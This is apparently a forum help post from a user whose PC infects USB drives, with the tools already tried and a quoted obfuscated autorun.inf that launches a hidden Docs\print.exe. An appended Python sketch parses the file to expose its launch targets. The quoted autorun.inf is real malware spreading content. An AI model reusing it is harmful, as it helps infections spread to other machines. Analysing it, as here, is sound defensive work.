Two days ago, against my better judgement, I installed a program. This program came from a torrent and checked out with an AVG scan. Living inside the packed installer was a little treat that you all can appreciate.
I knew what I was getting into the moment I saw svchost.exe appear in the install directory. I mean, obviously I knew I was being risky anyway, but I'm wasting your time.
What I have used so far:
MBAM, SAS, RootRepeal, SDFix, GooredFix, smitfraudfix, Hijackthis, AVG, SpybotS&D, AdAware
I have removed versions of smitfraud and trojan.dropper.agent.nsg etc.
I have recently removed CLB rootkit.
I must give thanks to all the guides on bleepingcomputer for all your excellent help. My process list looks much smaller, my machine is running as it did, I am no longer being redirected from my google searches and MBAM reports a clean full scan.
Still, my machine is infecting USB drives upon insertion.
When a drive is inserted, a folder and 3 files are created.
The docs folder is hidden and has a recycle bin icon.
I would assume inserting this infected drive into another machine would be unpleasant.
The autorun.inf is locked from editing in a normal environment.
The contents of the autorun.inf are as follows:
[autorun
;OEP
open=.\Docs\print.exe
;??
:cmp
;tg
icon=%SystemRoot%\system32\SHELL32.dll,4
:jmp3
;ü?g?ÝYwb??F?]L??CìF?mö?fò=?V÷ÍìTÿ
action=Open folder to view files using Windows Explorer
;?dë???a?s???éü?Y??;`äw??X???L
shell\\\\\\\open\\\\command=Docs////print.exe
:jne1
;?oÍjBv?è?|??
shell\\\explore\\\\\\\command=.\\\\Docs/print.exe
;ñ=T???L?AÑ???ÈxÖ
;;;;;;;;;;;;;
useautoplay=1
;à`Q??
;(?s??
[autorun]
:goto bleepavg
In this case "bleepavg" rhymes with duck.
I have not been able to find any google results regarding this combination of "docs" "print.exe" "autorun.inf" and "goto bleepavg".
Thank you for reading.
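
Added example, not part of the original post: a Python sketch that strips the filler lines from an autorun.inf like the one quoted above and lists the commands it would launch, so the real target is visible at a glance. The function names are hypothetical, the sample is abridged from the post, and treating ':' lines as filler and collapsing repeated slashes are assumptions about how the file is meant to be read.

```python
import re

# Keys that make a program run when the drive is opened or autoplayed.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

# Abridged from the post: key lines kept as posted, junk comments shortened.
SAMPLE = r"""[autorun
;OEP
open=.\Docs\print.exe
:cmp
icon=%SystemRoot%\system32\SHELL32.dll,4
:jmp3
;(junk comment shortened)
action=Open folder to view files using Windows Explorer
shell\\\\\\\open\\\\command=Docs////print.exe
:jne1
shell\\\explore\\\\\\\command=.\\\\Docs/print.exe
;;;;;;;;;;;;;
useautoplay=1
[autorun]
:goto bleepavg
"""

def collapse(s):
    """Collapse any run of slashes or backslashes into one backslash."""
    return re.sub(r"[\\/]+", r"\\", s)

def junk_lines(text):
    """Count filler lines: ';' comments and ':label' lines (assumed filler)."""
    return sum(1 for l in text.splitlines() if l.strip()[:1] in (";", ":"))

def autorun_targets(text):
    """Return {normalized key: normalized command} for execution-related keys."""
    found = {}
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments, labels, section headers and lines with no key=value.
        if not line or line[0] in ";:[" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = collapse(key.strip()).lower()
        if EXEC_KEY.match(key):
            found[key] = collapse(value.strip())
    return found

if __name__ == "__main__":
    print(junk_lines(SAMPLE), "filler lines")
    for key, target in autorun_targets(SAMPLE).items():
        print(f"{key} -> {target}")
```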